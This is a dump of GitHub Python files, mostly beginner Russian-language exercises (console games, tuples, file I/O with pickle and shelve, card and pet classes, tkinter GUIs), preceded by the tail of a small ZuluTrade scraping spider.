"alphanum_fraction": 0.649438202381134, "avg_line_length": 26.8125, "blob_id": "706e9aaf66daa9d5eda6ef5612dc717cc23204d1", "content_id": "933e9ce840e44ac95fbb2d990635c42649d33bec", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 890, "license_type": "no_license", "max_line_length": 195, "num_lines": 32, "path": "/socialtrading/socialtrading/spiders/zulu_spider2.py", "repo_name": "hyunsub-h/SocialTrading", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\nimport scrapy\nimport requests\nimport json\n\nclass TraderSpider(scrapy.Spider):\n name = \"zulu_spider2\"\n\n def start_requests(self):\n time_frame = 100000\n page_num = 0\n trading_size = 10000\n\n trader_id = []\n filename\n\n with open(filename, 'r') as f:\n trader_id = f.read().strip('\\n\\r')\n\n urls = []\n for trader_id in trader_ids:\n url = 'https://www.zulutrade.com/zulutrade-client/traders/api/providers/%d/tradeHistory?timeframe=%d&page=%d&size=%d&sort=date_closed,desc' % (trader_id, time_frame, page_num, trading_size)\n trading_data = json.loads(requests.get(url).text)\n with open('%d_trade.json' % (trader_id), 'w') as f:\n json.dump(trading_data, f) \n\n\n # articial one call to make scrapy work\n yield scrapy.Request(url=url, callback=self.parse_signal_page)\n\n def parse_signal_page(self, response):\n pass\n" } ]
4
StasNovikov/simple-games-on-Python
https://github.com/StasNovikov/simple-games-on-Python
9bcc27ea4996e3bdee6223050d655f88b9892fb2
8c8778904f24b1134b157982f703d5675a599ebe
1cc9fd3cca1239f30619d7e470c635d7cc2dcce9
refs/heads/master
2018-02-09T04:36:25.187958
2017-08-03T16:41:48
2017-08-03T16:41:48
96,676,422
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6912209987640381, "alphanum_fraction": 0.7053481340408325, "avg_line_length": 44.09090805053711, "blob_id": "981aee02c57f6c17b949d28a35e3b3fff1567179", "content_id": "4810c8493adb1110ab613a0bfe717c3d38b2a884", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1485, "license_type": "no_license", "max_line_length": 100, "num_lines": 22, "path": "/useless_trivia.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Бесполезные факты\n#\n# Узнает у пользователя его / ее личне данные и выдает несколько фактов\n# о нем / ней. Эти факты истинны, но совершенно бесполезны.\n\nname = input(\"Привет! Как тебя зовут?\");\nage = int(input(\"Сколько тебе лет?\"))\nweight = int(input(\"Хорошо. И последний вопрос. Сколько в тебе килограммов?\"))\nprint(\"\\nЕсли бы поэт Каммингс адресовал тебе письмо, он бы обратился к тебе так: \", name.lower())\nprint(\"А если бы это был рехнувшийся Каммингс, то так: \", name.upper())\ncalled = name * 5\nprint(\"\\nЕсли бы маленький ребёнок решил привлечь твоё внимание,\")\nprint(\"он произнёс бы твоё имя так:\")\nprint(called)\nseconds = age * 365 * 24 * 60 * 60\nprint(\"\\nТвой нынешний возраст - свыше \", seconds, \" секунд.\")\n\nmoon_weight = weight / 6\nprint(\"\\nЗнаете ли вы, что на Луне вы весили бы всего \", moon_weight, \" кг?\")\nsun_weight = weight * 27.1\nprint(\"А вот на Солнце, вы бы весили \", sun_weight, \" кг. (Но увы, это продолжалось бы недолго...)\")\ninput(\"\\n\\nНажмите Enter, чтобы выйти.\")" }, { "alpha_fraction": 0.7006980776786804, "alphanum_fraction": 0.7015706896781921, "avg_line_length": 26.975608825683594, "blob_id": "6c3e5aea47d7a6f5e0755eccb7cf9bd83c342c2d", "content_id": "95da4b65a2ad35b6f4c2ce2ab0813504c96c6f26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1587, "license_type": "no_license", "max_line_length": 69, "num_lines": 41, "path": "/ORWCFile/pickle_it.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Консервация данных в файд\n# Демонстрирует консервацию данных и доступ к ним\n\nimport pickle, shelve\n\nprint(\"Консервация списков\")\nvariety = [\"огурцы\",\"помидора\",\"капуста\"]\nshape = [\"целые\",\"кубиками\",\"соломкой\"]\nbrand = [\"Главпродукт\",\"Чумак\",\"Бондюэль\"]\n\n# Запись двоичных данных в файл\n# Для этого используется режим доступа - wb\nf = open(\"pickles.dat\",\"wb\")\n\n# Функция pickle.dump() - предназначена для консервации данных в файл\npickle.dump(variety, f)\npickle.dump(shape, f)\npickle.dump(brand, f)\nf.close()\nprint(\"\\nРасконсервация списков\")\nf = open(\"pickles.dat\",\"rb\")\nvariety = pickle.load(f)\nshape = pickle.load(f)\nbrand = pickle.load(f)\nprint(variety)\nprint(shape)\nprint(brand)\nf.close()\n\nprint(\"\\nПомещение списков на полку\")\ns = shelve.open(\"pickles2.dat\")\ns[\"variety\"] = [\"огурцы\",\"помидора\",\"капуста\"]\ns[\"shape\"] = [\"целые\",\"кубиками\",\"соломкой\"]\ns[\"brand\"] = [\"Главпродукт\",\"Чумак\",\"Бондюэль\"]\ns.sync() # Убедимся, что данные записаны\nprint(\"\\nИзвлечение списков из файла полки\")\nprint(\"Торговые марки - \", s[\"brand\"])\nprint(\"Формы - \", s[\"shape\"])\nprint(\"Виды овощей - \", s[\"variety\"])\ns.close()\ninput(\"Press the enter key to exit\")" }, { "alpha_fraction": 0.5471547842025757, "alphanum_fraction": 0.5582968592643738, "avg_line_length": 24.653060913085938, "blob_id": 
"8372cf8b44f904788987bd14d12d0d23f50550a1", "content_id": "0791c892a107a53b6a29b639672a9df8a12f665a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3041, "license_type": "no_license", "max_line_length": 76, "num_lines": 98, "path": "/OOP/playing_cards2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Карты 2.0\n# Демонстрирует расширение класса через наследование\nclass Card(object):\n \"\"\" Одна игральая карта \"\"\"\n RANKS = [\"A\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"J\",\"Q\",\"K\"]\n SUITS = [\"c\",\"d\",\"h\",\"s\"]\n\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def __str__(self):\n rep = self.rank + self.suit\n return rep\n\nclass Hand(object):\n \"\"\" 'Рука': набор карт на руках у одного игрока \"\"\"\n def __init__(self):\n self.cards = []\n\n def __str__(self):\n if self.cards:\n rep = \"\"\n for card in self.cards:\n rep += str(card) + \"\\t\"\n else:\n rep = \"<пусто>\"\n\n return rep\n\n def clear(self):\n \"\"\" Очистить руку \"\"\"\n self.cards = []\n\n def add(self, card):\n \"\"\" Добавление карты \"\"\"\n self.cards.append(card)\n\n def give(self, card, other_hand):\n \"\"\" Отдать карты \"\"\"\n self.cards.remove(card)\n other_hand.add(card)\n\nclass Deck(Hand):\n \"\"\" Колода игральных карт \"\"\"\n def populate(self):\n \"\"\" Формирование колоды \"\"\"\n self.cards = []\n for suit in Card.SUITS:\n for rank in Card.RANKS:\n self.add(Card(rank, suit))\n\n def shuffle(self):\n \"\"\" Перемешивание колоды, переставление карт в случайном порядке \"\"\"\n import random\n random.shuffle(self.cards)\n\n def deal(self, hands, per_hand = 1):\n \"\"\" Расдача карт \"\"\"\n for round in range(per_hand):\n for hand in hands:\n if self.cards:\n top_card = self.cards[0]\n self.give(top_card, hand)\n else:\n print(\"Не могу больше сдавать: карты кончились!\")\n\n# основная часть\ndeck1 = Deck()\nprint(\"Создана новая колода.\")\nprint(\"Вот эта колода: \")\nprint(deck1)\ndeck1.populate()\nprint(\"\\nВ колоде появились карты.\")\nprint(\"Вот как она выглядит теперь: \")\nprint(deck1)\ndeck1.shuffle()\nprint(\"\\nКолода перемешена\")\nprint(\"Вот как она выглядит теперь: \")\nprint(deck1)\nmy_hand = Hand()\nyour_hand = Hand()\nhands = [my_hand, your_hand]\n# раздадим в кадую руку по 5 карт\ndeck1.deal(hands, per_hand=5)\nprint(\"\\nМне и Вам на руки роздано по 5 карт.\")\nprint(\"У меня на руках: \")\nprint(my_hand)\nprint(\"У Вам на руках: \")\nprint(your_hand)\nprint(\"В колоде осталось: \")\nprint(deck1)\n\ndeck1.clear()\nprint(\"Колода очищена\")\nprint(\"Вот как она выглядит теперь: \")\nprint(deck1)\ninput(\"\\n\\nPress the enter key to exit.\")" }, { "alpha_fraction": 0.7460317611694336, "alphanum_fraction": 0.7460317611694336, "avg_line_length": 20.33333396911621, "blob_id": "3d4e71d0db4b0544e9cf18c1d31700823e2d1902", "content_id": "c3436cd41265b9d8f015c7d81cfc5c6f5eddb2aa", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 79, "license_type": "no_license", "max_line_length": 34, "num_lines": 3, "path": "/GameOver.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# GameOver\nprint(\"GameOver\")\ninput(\"Нажите Enter, чтобы выйти\")" }, { "alpha_fraction": 0.6144958138465881, "alphanum_fraction": 0.6144958138465881, "avg_line_length": 21.690475463867188, "blob_id": "e9c2c2ba5e96d86171df9f07a4acb59b2efea7d7", "content_id": 
"0316ab5d506a511d8ca026c76c94801b98a28d92", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1244, "license_type": "no_license", "max_line_length": 62, "num_lines": 42, "path": "/OOP/property_critter.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Демонстрирует работу со свойствами\nclass Critter(object):\n \"\"\" Виртуальный питомец \"\"\"\n def __init__(self, name):\n print(\"Появилась на свет новая зверюшка\")\n self.__name = name\n\n @property\n def name(self):\n return self.__name\n\n @name.setter\n def name(self, new_name):\n if new_name == \"\":\n print(\"Имя зверюшки на может быть пустой строкой\")\n else:\n self.__name = new_name\n print(\"Имя успешно изменено.\")\n\n def talk(self):\n print(\"\\nПривет! Меня зовут \", self.name)\n\n# основная часть\ncrit = Critter(\"Бобик\")\ncrit.talk()\n\nprint(\"Мою зверюшку зовут \", end=\" \")\nprint(crit.name)\n\nprint(\"Пытаюсь изменить имя на - 'Джекки'\")\ncrit.name = \"Джекки\"\n\nprint(\"Мою зверюшку зовут \", end=\" \")\nprint(crit.name)\n\nprint(\"Пытаюсь изменить имя на пустую строку\")\ncrit.name = \"\"\n\nprint(\"Мою зверюшку зовут \", end=\" \")\nprint(crit.name)\n\ninput(\"\\nНажмите Enter, чтобы выйти!\")" }, { "alpha_fraction": 0.664160430431366, "alphanum_fraction": 0.6741854548454285, "avg_line_length": 24, "blob_id": "5b1609b9d1b61c3998403015b7d033c19a800d71", "content_id": "df91d80cd75da82b8c847cbb872207dc9646714a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 539, "license_type": "no_license", "max_line_length": 65, "num_lines": 16, "path": "/OOP/constructor_critter.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Зверюшка с конструктором\n# Демонстрирует метод-конструктор\nclass Critter(object):\n \"\"\" Виртуальный питомец \"\"\"\n def __init__(self):\n print(\"Появилась на свет новая зверюшка!\")\n\n def talk(self):\n print(\"\\nПривет! 
Я зверюшка - экземпляр класса Critter.\")\n\n# Основная часть\ncrit1 = Critter()\ncrit2 = Critter()\ncrit1.talk()\ncrit2.talk()\ninput(\"\\n\\nPress the Enter key to exit.\")" }, { "alpha_fraction": 0.5674974322319031, "alphanum_fraction": 0.5841121673583984, "avg_line_length": 22.487804412841797, "blob_id": "fcf1efef938f105a1437b04e8ae25795b0bda906", "content_id": "7513bc9702ddf3713dbb9830b38f818dfbc635b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2306, "license_type": "no_license", "max_line_length": 70, "num_lines": 82, "path": "/OOP/playing_cards.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Карты\n# Демонстрирует сочетание объектов\nclass Card(object):\n \"\"\" Одна игральая карта \"\"\"\n RANKS = [\"A\",\"1\",\"2\",\"3\",\"4\",\"5\",\"6\",\"7\",\"8\",\"9\",\"10\",\"J\",\"Q\",\"K\"]\n SUITS = [\"c\",\"d\",\"h\",\"s\"]\n\n def __init__(self, rank, suit):\n self.rank = rank\n self.suit = suit\n\n def __str__(self):\n rep = self.rank + self.suit\n return rep\n\nclass Hand(object):\n \"\"\" 'Рука': набор карт на руках у одного игрока \"\"\"\n def __init__(self):\n self.cards = []\n\n def __str__(self):\n if self.cards:\n rep = \"\"\n for card in self.cards:\n rep += str(card) + \" \"\n else:\n rep = \"<пусто>\"\n\n return rep\n\n def clear(self):\n \"\"\" Очистить руку \"\"\"\n self.cards = []\n\n def add(self, card):\n \"\"\" Добавление карты \"\"\"\n self.cards.append(card)\n\n def give(self, card, other_hand):\n \"\"\" Отдать карты \"\"\"\n self.cards.remove(card)\n other_hand.add(card)\n\n# основная часть\ncard1 = Card(rank=\"A\", suit=\"c\")\nprint(\"Вывожу на экран объект-карту\")\nprint(card1)\ncard2 = Card(rank=\"2\", suit=\"c\")\ncard3 = Card(rank=\"3\", suit=\"c\")\ncard4 = Card(rank=\"4\", suit=\"c\")\ncard5 = Card(rank=\"5\", suit=\"c\")\nprint(\"\\nВывод ещё четырёх карт\")\nprint(card2)\nprint(card3)\nprint(card4)\nprint(card5)\n\nmy_hand = Hand()\nprint(\"\\nПечатаю карты, которые у меня на руках до раздачи\")\nprint(my_hand)\n\nmy_hand.add(card1)\nmy_hand.add(card2)\nmy_hand.add(card3)\nmy_hand.add(card4)\nmy_hand.add(card5)\nprint(\"\\nПечатаю карты, которые у меня на руках после раздачи\")\nprint(my_hand)\n\nyou_hand = Hand()\nmy_hand.give(card1, you_hand)\nmy_hand.give(card2, you_hand)\nprint(\"\\nПервые две из моих я передал вам:\")\nprint(\"Теперь у вас на руках\")\nprint(you_hand)\nprint(\"А у меня на руках\")\nprint(my_hand)\n\nmy_hand.clear()\nprint(\"\\nУ меня на руках после того, как я сбросил все карты:\")\nprint(my_hand)\ninput(\"\\n\\nНажмите Enter, чтобы выйти\")\n" }, { "alpha_fraction": 0.6341189742088318, "alphanum_fraction": 0.6464646458625793, "avg_line_length": 30.85714340209961, "blob_id": "57b3524fa995450ce656ac3751f17c13e951e3d1", "content_id": "41213bf621a1812629264fecaaec84dd17858bd6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1369, "license_type": "no_license", "max_line_length": 96, "num_lines": 28, "path": "/instructions.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Инструкция\n# Демонстрирует, как создавать собственные функции\ndef instructions():\n \"\"\" Выводит на экран инструкцию для игрока \"\"\"\n print(\n \"\"\"\n Добро пожаловать на ринг грандиознейших ителлектуальных состязаний всех времён.\n Твой мозг и мой процессор сойдутся в схватке за доской игры \"Крестики-нолики\".\n Чтобы сделать ход, введи число от 0 до 8. 
Числа однозначно соответствуют полям\n доски - так, как показано ниже:\n\n 0 | 1 | 2\n ---------\n 3 | 4 | 5\n ---------\n 6 | 7 | 8\n\n Приготовься к бою, жалкий бестолковый человечишка! Вот-вот начнется решающее сражение.\\n\n \"\"\"\n )\n\n# основная часть\nprint(\"Это инструкция для игры в 'Крестики-нолики'.\")\ninstructions()\nprint(\"Это опять та же самая инструкция: \")\ninstructions()\nprint(\"Надеюсь теперь смысл игры ясен.\")\ninput(\"Press the enter key to exit!\")" }, { "alpha_fraction": 0.5836177468299866, "alphanum_fraction": 0.5995449423789978, "avg_line_length": 24.882352828979492, "blob_id": "0ae71fd0d58d52456c41f82320dd2e4573176ec4", "content_id": "5d918f21ebd0724762f24a4ee5bbc03a1e53981a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1075, "license_type": "no_license", "max_line_length": 70, "num_lines": 34, "path": "/OOP/GUI/simple_gui2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Демонстрирует создание класса в оконном приложении на основе tkinter\nfrom tkinter import *\n\nclass Application(Frame):\n \"\"\" GUI-приложение с тремя кнопками \"\"\"\n\n def __init__(self, master):\n \"\"\" Инициализирует рамку \"\"\"\n super(Application, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Создание кнопок \"\"\"\n # первая кнопка\n self.btn1 = Button(self, text=\"Я ничего не делаю!\")\n self.btn1.grid()\n # вторая кнопка\n self.btn2 = Button(self)\n self.btn2.grid()\n self.btn2.configure(text=\"И я тоже!\")\n # третья кнопка\n self.btn3 = Button(self)\n self.btn3.grid()\n self.btn3[\"text\"] = \"И я!\"\n\n# основная часть\nroot = Tk()\nroot.title(\"Работа с кнопками\")\nroot.geometry(\"200x150\")\n\napp = Application(root)\n\nroot.mainloop()" }, { "alpha_fraction": 0.700564980506897, "alphanum_fraction": 0.7163841724395752, "avg_line_length": 30.64285659790039, "blob_id": "1763832be56814923a6d1fb8552e1b7bf2696170", "content_id": "5254f7976cacaf97a5fbd3ad954f074ef479521b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1315, "license_type": "no_license", "max_line_length": 89, "num_lines": 28, "path": "/guess_my_number.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Отгадай число\n#\n# Компьютер выбирает случайное число в диапазоне от 1 до 100\n# Игрок пытается отгадать это число\n# Компьютер говорит предположение больше/меньше чем загаданное число или число - отгадано\nimport random\n\nprint(\"\\tДобро пожаловать в игру 'Отгадай число'!\")\nprint(\"\\nЯ загадал натуральное число из диапазона от 1 до 100\")\nprint(\"Постарайтесь отгадать его за минимальное количество попыток.\\n\")\n\n# начальные значения\nthe_number = random.randint(1, 100)\nguess = int(input(\"Ваше предположение: \"))\ntries = 1\n\n# цикл отгадывания\nwhile guess != the_number:\n if guess > the_number:\n print(\"Меньше...\")\n else:\n print(\"Больше...\")\n guess = int(input(\"Ваше предположение: \"))\n tries += 1\n\nprint(\"\\nВам удалось отгадать число! 
Это в самом деле \", the_number)\nprint(\"Вы затратили на отгадывание \", tries, \" попыток!\\n\")\ninput(\"Press the enter key to exit\")" }, { "alpha_fraction": 0.3461891710758209, "alphanum_fraction": 0.35078054666519165, "avg_line_length": 21.244897842407227, "blob_id": "88045ec712522b2ec6da7c0aca9e8d6a30308ab7", "content_id": "444a6152e39a4b82f32cd87451f0529c47fa2522", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1331, "license_type": "no_license", "max_line_length": 85, "num_lines": 49, "path": "/mood_computer.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Компьютерный датчик настроения\n# Демонстрирует работу условного оператора if: ... elif: ... else:\nimport random\nprint(\"Я ощущаю Вашу энергетику. От моего экрана не скрыто ни одно из Ваших чувств.\")\nprint(\"Итак. Ваше настроение...\")\nmood = random.randint(1,3)\nif mood == 1:\n # радостное\n print(\n \"\"\"\n ___________\n | |\n | O O |\n | < |\n | , , |\n | ... |\n |__________|\n \"\"\"\n )\nelif mood == 2:\n # так себе\n print(\n \"\"\"\n ___________\n | |\n | O O |\n | < |\n | |\n | ..... |\n |__________|\n \"\"\"\n )\nelif mood == 3:\n # прескверное\n print(\n \"\"\"\n ___________\n | |\n | O O |\n | < |\n | .. |\n | .. .. |\n |__________|\n \"\"\"\n )\nelse:\n print(\"Не бывает такого настроения! (Должно быть, Вы совершенно не в себе.)\")\n print(\"...Но это только сегодня.\")\n input(\"\\n\\nPress the enter key to exit.\")" }, { "alpha_fraction": 0.7047619223594666, "alphanum_fraction": 0.7166666388511658, "avg_line_length": 34.08333206176758, "blob_id": "222d5257736a4cc893da56594aa0a61c81a8e11c", "content_id": "58ea001ed5ba5ad92dd335d5d684625f0ba40956", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 547, "license_type": "no_license", "max_line_length": 55, "num_lines": 12, "path": "/ORWCFile/write_it.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Запишем\n# демонстрирует запись в текстовый файл\nprint(\"Создаю текстовый файл методом write()\")\ntext_file = open(\"write_it.txt\", \"w\", encoding='utf-8')\ntext_file.write(\"Строка 1\\n\")\ntext_file.write(\"Это строка 2\\n\")\ntext_file.write(\"Этой строке достался номер 3\\n\")\ntext_file.close()\nprint(\"\\nЧитаю вновь созданный файл\")\ntext_file = open(\"write_it.txt\", \"r\", encoding='utf-8')\nprint(text_file.read())\ntext_file.close()" }, { "alpha_fraction": 0.6361867785453796, "alphanum_fraction": 0.6449416279792786, "avg_line_length": 31.15625, "blob_id": "e39721698dbf874a99a04345aa0f4fc602758160", "content_id": "ce508dcf20b15a68bd020a3f69711abd82516c6e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1352, "license_type": "no_license", "max_line_length": 86, "num_lines": 32, "path": "/OOP/GUI/click_counter.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Счётчик нажатий\n# Демонстрирует связывание событий с обработчиками\nfrom tkinter import *\n\nclass Application(Frame):\n \"\"\" GUI-приложение, которое подсчитывает количество нажатий кнопки \"\"\"\n def __init__(self, master):\n \"\"\" Инициализирует рамку \"\"\"\n super(Application, self).__init__(master)\n self.grid()\n # кол-во нажатий\n self.btn_clicks = 0\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Создает кнопку, на которой отображается количество совершённых нажатий \"\"\"\n 
self.btn = Button(self)\n self.btn[\"text\"] = \"Количество щелчков: 0\"\n self.btn[\"command\"] = self.update_count\n self.btn.grid()\n\n def update_count(self):\n \"\"\" Увеличивает количество нажатий кнопки на единицу и отображает его \"\"\"\n self.btn_clicks += 1\n self.btn[\"text\"] = \"Количество щелчков: \" + str(self.btn_clicks)\n\n# основная часть\nroot = Tk()\nroot.title(\"Количество нажатий\")\nroot.geometry(\"300x250\")\napp = Application(root)\nroot.mainloop()" }, { "alpha_fraction": 0.7129186391830444, "alphanum_fraction": 0.7129186391830444, "avg_line_length": 37.09090805053711, "blob_id": "4fd220d1ae91061b7fba7bf4b4a6cc05144919fb", "content_id": "36170bb45e4df59fa2231c50b077a209f8d66525", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 565, "license_type": "no_license", "max_line_length": 75, "num_lines": 11, "path": "/no_vowels.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Только согласные\n# Демонстрирует, как создавать новые строки из исходных с помощью цикла for\nmessage = input(\"Введите текст: \")\nnew_message = \"\"\nVOWELS = \"aeiouaеёиоуыэюя\"\nfor letter in message:\n if letter.lower() not in VOWELS:\n new_message += letter\n print(\"Создана новая строка: \", new_message)\nprint(\"\\nВот ваш текст с изятыми гласными буквами: \", new_message)\nprint(\"\\nPress the enter to exit\")" }, { "alpha_fraction": 0.714525580406189, "alphanum_fraction": 0.7162048816680908, "avg_line_length": 31.216217041015625, "blob_id": "187045dbfc3dd910eba8ab4f31f4cb2c2f9317d2", "content_id": "e5b3c8eb801a0b06725c650cf2d4b5163eadd0b1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1702, "license_type": "no_license", "max_line_length": 81, "num_lines": 37, "path": "/hero's_inventory2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Арсенал героя 2.0\n# Демонстрирует работу с кортежами\n# Создадим кортеж с несколькими элементами и выведем его с помощью цикла for\ninventory = (\n \"меч\",\n \"кольчуга\",\n \"щит\",\n \"целебное снадобье\"\n)\n\nprint(\"\\nИтак, в Вашем арсенале: \")\nfor item in inventory:\n print(item)\ninput(\"\\nPress the enter key to exit\")\n\n#найдем длину кортежа\nprint(\"\\nСейчас в Вашем распоряжении \", len(inventory), \" предмета/-ов.\")\ninput(\"\\nPress the enter key to exit\")\n\n# Вывод одного предмета с определенным индексом\nindex = int(input(\"\\nВведите индекс одного из предметов арсенала: \"))\nprint(\"Под индексом \", index, \" в арсенале находится \", inventory[index])\n\n# отобразим срез\nstart = int(input(\"\\nВведите начальный индекс среза: \"))\nfinish = int(input(\"\\nВведите конечный индекс среза: \"))\nprint(\"Срез inventory[\", start, \":\", finish, \"] - это \", inventory[start:finish])\ninput(\"\\nPress the enter key to exit\")\n\n# соединим два кортежа\nchest = (\"золото\", \"драгоценные камни\")\nprint(\"Вы нашди ларец. 
Его содержимое: \", chest)\nprint(\"Вы приобщили содержимое ларца к своему арсеналу.\")\ninventory += chest\nprint(\"Теперь в вашем распоряжении: \")\nprint(inventory)\ninput(\"\\nPress the enter key to exit\")" }, { "alpha_fraction": 0.7144970297813416, "alphanum_fraction": 0.7352070808410645, "avg_line_length": 18.342857360839844, "blob_id": "db05714c6f29bea055679efb7a0538f4b8060ea9", "content_id": "8fb9319b72b6817948352b62786233547fc5edbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 971, "license_type": "no_license", "max_line_length": 61, "num_lines": 35, "path": "/OOP/GUI/simple_gui.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# Простейший GUI\n# Демонстрирует создание окна\nfrom tkinter import *\n\n# создание окна\nroot = Tk()\n\n# изменение окна\nroot.title(\"Простейший GUI\")\nroot.geometry(\"200x100\")\n\n# внутри окна создается рамка для размещения других элементов\napp = Frame(root)\napp.grid()\n\n# создание метки внутри рамки\nlbl = Label(app, text=\"Тестовая метка\")\nlbl.grid()\n\n# создание первой кнопки внутри рамки\nbtn1 = Button(app, text=\"Ничего не делаю!\")\nbtn1.grid()\n\n# создание второй кнопки внутри рамки\nbtn2 = Button(app)\nbtn2.grid()\nbtn2.configure(text=\"И я тоже\")\n\n# создание третьей кнопки внутри рамки\nbtn3 = Button(app)\nbtn3.grid()\nbtn3[\"text\"] = \"И я!\"\n\n# старт событийного цикла\nroot.mainloop()" }, { "alpha_fraction": 0.6356107592582703, "alphanum_fraction": 0.6501035094261169, "avg_line_length": 41.0217399597168, "blob_id": "0864af14ed0d49dcda394e790915c00be5d850c7", "content_id": "f9b4280683c8b2aa845d39b5026eae4f17c3a2cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2438, "license_type": "no_license", "max_line_length": 125, "num_lines": 46, "path": "/OOP/GUI/movie_chooser2.py", "repo_name": "StasNovikov/simple-games-on-Python", "src_encoding": "UTF-8", "text": "# киноман-2\n# Демонстрирует переключатель\nfrom tkinter import *\n\nclass Application(Frame):\n \"\"\" GUI-приложение, позволяющее выбрать один любимый жанр кино \"\"\"\n def __init__(self, master):\n super(Application, self).__init__(master)\n self.grid()\n self.create_widgets()\n\n def create_widgets(self):\n \"\"\" Создает элементы, с помощью которых пользователь будет выбирать \"\"\"\n # Метка описание\n Label(self, text=\"Укажите ваш любимый жанр кино\").grid(row=0, column=0, sticky=W)\n # Метка-инструкиця\n Label(self, text=\"Выберите ровно один:\").grid(row=1, column=0, sticky=W)\n # переменная для хранения сведений о единственном любимом жанре\n self.favorite = StringVar()\n self.favorite.set(None)\n # положение \"Комедия\" переключателя\n Radiobutton(self, text=\"Комедия\", variable=self.favorite, value=\"комедия.\", command=self.update_text).grid(\n row=2, column=0, sticky=W)\n # положение \"Драма\" переключателя\n Radiobutton(self, text=\"Драма\", variable=self.favorite, value=\"драма.\", command=self.update_text).grid(\n row=3, column=0, sticky=W)\n # положение \"Кино о любви\" переключателя\n Radiobutton(self, text=\"Кино о любви\", variable=self.favorite, value=\"кино о любви.\", command=self.update_text).grid(\n row=4, column=0, sticky=W)\n # текстовая область с результатами\n self.resut_text = Text(self, width=40, height=5, wrap=WORD)\n self.resut_text.grid(row=5, column=0, columnspan=3)\n\n def update_text(self):\n \"\"\" Обновляя текстовую область, вписывает в нее любимый жанр \"\"\"\n message = 
\"Ваш любимый киножанр: \"\n message += self.favorite.get()\n self.resut_text.delete(0.0, END)\n self.resut_text.insert(0.0, message)\n\n# Основная частт\nroot = Tk()\nroot.title(\"Киноман-2\")\nroot.geometry(\"350x150\")\napp = Application(root)\nroot.mainloop()" } ]
17
jsmlau/seven-segment-display-gui
https://github.com/jsmlau/seven-segment-display-gui
07132a55a95da9746a13065a58ba350bf7ccfdd6
fcb777ebe92cb86188d514556e622708152be4d1
1333b161da49551fd6e3b87c117c18c3e0d69328
refs/heads/master
2022-11-26T08:19:59.829496
2020-07-31T18:30:39
2020-07-31T18:30:39
283,948,756
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5093961954116821, "alphanum_fraction": 0.5195151567459106, "avg_line_length": 37.76293182373047, "blob_id": "a6e442ce587cc5503c57c839a15a60c47658206b", "content_id": "b6ea3c880ebaad8a02116ab984a0a89303318812", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8994, "license_type": "no_license", "max_line_length": 97, "num_lines": 232, "path": "/seven_segment_display_gui.py", "repo_name": "jsmlau/seven-segment-display-gui", "src_encoding": "UTF-8", "text": "\"\"\"\nA Seven-Segment Display in a GUI.py\n\nCreated by Jas Lau on 7/30/19.\nCopyright © 2019 Jas Lau. All rights reserved.\n\"\"\"\nimport tkinter as tk\nimport tkinter.messagebox as tkmb\nimport seven_segment_logic as ssl\n\n\n# ================================ Client (As a Function) ================================\n\ndef main():\n root_win = tk.Tk()\n demo_cls_ref = SevenSegmentGUI(root_win)\n demo_cls_ref.get_root().title(\"Seven Segment Display\")\n demo_cls_ref.get_root().mainloop()\n\n\n# ============================== End of Client (As a Function) ==============================\n\n# =================================== SevenSegmentGUI Class =================================\n\nclass SevenSegmentGUI:\n INITIAL_DIG = 0\n 